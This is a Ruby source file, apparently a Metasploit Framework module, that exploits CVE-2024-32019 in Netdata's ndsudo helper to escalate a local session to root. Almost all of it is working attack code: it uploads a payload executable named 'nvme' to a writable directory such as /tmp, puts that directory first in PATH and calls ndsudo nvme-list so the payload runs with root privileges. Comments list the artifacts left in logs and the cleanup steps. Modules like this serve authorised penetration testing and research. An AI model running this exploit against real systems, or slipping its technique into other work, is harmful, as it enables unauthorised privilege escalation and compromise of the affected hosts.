rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local module for CVE-2024-32019, the untrusted-search-path flaw in Netdata's
# `ndsudo` helper. Per the module description, ndsudo resolves helper commands
# such as `nvme` through the caller's $PATH and runs the first match.
#
# Artifacts this module leaves on a host (it declares IOC_IN_LOGS):
#   * an executable named `nvme` inside WritableDir (default /tmp);
#   * one run of NdsudoPath with the argument `nvme-list` and a PATH whose
#     first entry is WritableDir.
# The dropped file is registered with FileDropper for cleanup.
#
# Affected versions and the fix are in the GHSA advisory listed in References.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Declares the module metadata and the two advanced options:
  # WritableDir (where the file is dropped) and NdsudoPath (the ndsudo binary).
  def initialize(info = {})
    details = {
      'Name' => 'Netdata ndsudo privilege escalation',
      'Description' => %q{
        The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'msutovsky-r7', # msf module
        'mia-0' # security researcher
      ],
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets' => [[ 'Auto', {} ]],
      'Privileged' => true,
      'References' => [
        [ 'URL', 'https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93'],
        [ 'CVE', '2024-32019']
      ],
      'DisclosureDate' => '2024-04-12',
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => [IOC_IN_LOGS]
      }
    }

    super(update_info(info, details))

    register_advanced_options(
      [
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('NdsudoPath', [ true, 'A path to ndsudo binary on the target system', '/usr/libexec/netdata/plugins.d/ndsudo'])
      ]
    )
  end

  # Presence probe only: confirms that NdsudoPath is an executable file and
  # that running it with no arguments prints ndsudo's argument-count error.
  #
  # NOTE(review): no version comparison is made (the author found no reasonable
  # way to read the version), so `Appears` does not prove the build is
  # unpatched. Whether fixed releases print the same message is not visible
  # here; confirm the installed Netdata version against the advisory before
  # treating a host as vulnerable.
  def check
    ndsudo = datastore['NdsudoPath']

    if !file?(ndsudo) || !executable?(ndsudo)
      return CheckCode::Safe('Vulnerable binary not detected, check NdsudoPath option')
    end

    expected_usage_error = 'at least 2 parameters are needed, but 1 were given.'
    if cmd_exec(ndsudo) != expected_usage_error
      return CheckCode::Unknown('Failed to run vulnerable binary, either binary is not ndsudo or user does not have right to execute ndsudo')
    end

    CheckCode::Appears('Vulnerable binary detected')
  end

  # Drops the payload as `nvme` in WritableDir, then runs ndsudo's `nvme-list`
  # command with WritableDir placed first in PATH.
  #
  # Aborts early if the session is already root (unless ForceExploit is set),
  # if WritableDir is not writable, or if the upload fails.
  def exploit
    drop_dir = datastore['WritableDir']

    fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override') if !datastore['ForceExploit'] && is_root?

    fail_with(Failure::BadConfig, "#{drop_dir} is not writable") unless writable?(drop_dir)

    # The file name must match the helper that ndsudo looks up on PATH.
    decoy_path = "#{drop_dir}/nvme"
    vprint_status("Creating malicious file at #{decoy_path}")

    uploaded = upload_and_chmodx(decoy_path, generate_payload_exe)
    fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless uploaded

    # Registered for cleanup so the dropped file does not stay on disk.
    register_files_for_cleanup(decoy_path)

    vprint_status('Executing..')

    # The PATH override applies to this one command only. An ndsudo execution
    # with a world-writable directory first in PATH is the detectable event.
    launch_line = "PATH=#{drop_dir}:$PATH '#{datastore['NdsudoPath']}' nvme-list"
    cmd_exec(launch_line)
  end
end